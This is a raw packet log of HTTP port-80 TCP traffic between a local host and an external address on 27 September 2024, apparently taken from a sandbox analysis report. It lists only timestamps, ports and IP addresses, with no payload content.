Sep 27, 2024 00:15:08.898271084 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898277044 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898289919 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898303032 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898330927 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898349047 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898422956 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898468018 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898502111 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898514986 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898547888 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898571014 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898597002 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898607969 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898618937 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898629904 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898646116 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898669958 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898675919 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898683071 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898694038 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898711920 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898745060 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898886919 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898897886 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898909092 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898920059 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898931026 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898931980 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898948908 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898961067 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898964882 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.898972988 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898983955 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898994923 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.898996115 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899017096 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899043083 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899142027 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899153948 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899166107 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899177074 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899187088 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899188995 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899199963 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899209023 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899213076 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899245977 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899271011 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899272919 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899315119 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899348974 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899360895 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899372101 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899395943 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899406910 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899411917 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899411917 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899420023 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899445057 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899468899 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899476051 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899509907 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899533033 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899544954 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899576902 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899590969 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899607897 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899619102 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899630070 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899641037 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899652004 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899679899 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899703979 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899734020 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899744987 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899755955 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899766922 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899777889 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899780035 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899804115 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899832010 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.899966002 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899976015 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899987936 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.899998903 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900026083 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900036097 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900048018 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900057077 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900059938 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900078058 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900110006 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900204897 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900216103 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900227070 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900238991 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900248051 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900253057 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900265932 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900275946 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900280952 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900288105 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900299072 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900314093 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900337934 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900378942 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900433064 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900477886 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900629044 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900640965 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900650978 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900661945 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900671959 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.900675058 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900702000 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.900733948 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902245045 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902295113 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902297974 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902312040 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902340889 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902357101 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902359009 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902371883 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902381897 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902394056 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902400970 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902430058 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902463913 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902571917 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902584076 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902594090 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902606010 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902616024 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902616978 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902628899 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902636051 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902641058 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902652025 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902663946 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902673006 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902692080 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902707100 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902848959 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902862072 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902873993 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902884007 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902894974 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902894974 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902908087 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902915955 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902920008 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902932882 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902944088 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.902946949 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902966022 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.902993917 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.903151989 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903162956 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903172970 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903183937 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903194904 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903198957 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.903208017 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903219938 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903227091 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.903230906 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903235912 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.903244019 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903256893 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903275013 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.903322935 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.903403997 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903414965 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903425932 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903438091 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903450012 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.903454065 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.903481007 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.903507948 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.986679077 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986705065 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986721039 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986804008 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.986836910 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.986850977 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986865044 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986875057 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986891985 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986902952 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986905098 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.986913919 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986926079 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986927032 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.986938953 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986951113 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.986967087 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987004042 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987035990 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987047911 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987082005 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987101078 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987108946 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987112999 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987126112 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987138033 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987145901 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987165928 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987173080 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987185955 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987191916 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987230062 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987457037 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987507105 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987517118 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987528086 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987596989 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987622976 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987633944 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987646103 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987658024 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987664938 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987696886 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987724066 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987806082 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987818003 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987828970 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987840891 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987849951 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987854004 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987871885 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987876892 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987879992 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987893105 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987904072 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.987910986 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987931967 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.987943888 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988028049 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988039017 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988050938 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988063097 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988075018 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988075972 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988080025 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988102913 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988135099 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988188028 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988199949 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988210917 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988223076 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988234043 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988244057 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988245010 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988255978 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988289118 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988313913 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988326073 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988358974 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988399982 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988482952 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988495111 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988506079 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988517046 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988523960 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988528967 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988531113 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988534927 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988548994 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988554001 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988564968 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988580942 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988611937 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.988971949 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988982916 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.988992929 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989005089 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989017010 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989020109 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989028931 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989041090 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989049911 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989052057 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989067078 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989079952 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989099026 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989129066 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989130020 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989144087 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989157915 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989168882 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989176989 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989180088 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989192963 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989193916 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989207029 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989217043 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989217997 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989231110 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989250898 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989272118 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989362001 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989373922 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989384890 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989396095 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989409924 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989413023 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989422083 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989447117 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989480019 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989659071 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989670038 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989681005 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989694118 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989703894 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989705086 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989717960 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989725113 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989728928 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989742041 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989753008 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989758015 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989764929 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989777088 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989784956 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989787102 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989799976 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989806890 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989810944 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989825010 CEST	80	49764	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:08.989834070 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:08.989837885 CEST	80	49764	147.45.44.104	192.168.2.4
